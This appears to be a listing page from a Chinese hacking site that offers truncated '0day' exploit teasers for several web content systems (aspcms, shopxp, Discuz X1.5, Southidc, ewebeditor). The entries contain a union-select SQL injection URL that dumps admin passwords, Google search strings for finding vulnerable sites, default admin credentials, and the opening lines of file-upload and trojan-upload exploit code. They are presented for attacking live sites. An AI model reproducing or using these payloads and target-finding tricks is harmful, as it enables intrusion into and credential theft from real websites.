aspcms建站系统注入0day

aspcms开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且 支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。 漏洞文件:/plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转,所以要快,建议用快捷键复制 爆用户名EXP: https://www.webshell.cc/plug/productbuy.asp?id=2...

- 阅读全文 -

shopxp网上购物系统v7.4爆密码0day

版 本:shopxp网上购物系统 v7.4 关键词:inurl:shopxp_news.asp 后 台:shopxp_admin 暴密码的语句: /TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin ...

- 阅读全文 -

Discuz 1.5 配合NGINX二次解析爆路径BUG

作者:晴天小铸 测试环境:discuz X1.5+nginx 1.0 漏洞文件source/function/function_core.php,代码: $_G['setting']['domain']['app']['default'] && $content = preg_replace("/ 利用代码: https://www.webshell.cc/forum.php/adm...

- 阅读全文 -

Discuz! X1.5爆0day漏洞 建议升级2.0版本

近日,网络上开始流传一个影响到Discuz! X1.5的0day漏洞,据说利用此漏洞可以上传php木马。建议Discuz! X1.5升级2.0版本。 以下为黑客公布的Discuz! X1.5 0day 利用方法:     把下面内容保存为exp.php   在php环境下运行 php exp.php <?php print_r(' +-------------------...

- 阅读全文 -

南方数据企业网站V13静态版

采用了SouthidcEditor5.5版本编辑器 经过测试网上的ewebeditor5.5 0day用不了 利用方法 Google搜索:inurl:ASP/Default.html 后台/SouthidcEditor/admin/login.asp 默认帐号admin 密码admin888

- 阅读全文 -

ewebeditor PHP 3.8版本上传任意文件0day

PHP版本的ewebeditor用的比ASP版本的少的多吧,俺是非常少碰到。貌似 听说国外用的非常多。台湾人喜欢用?用的着的关注一下吧。 EXP如下: <title>eWebeditoR3.8 for php任意文件上EXP</title> <form action="" method=post enctype="multipart/form-data"> &l...

- 阅读全文 -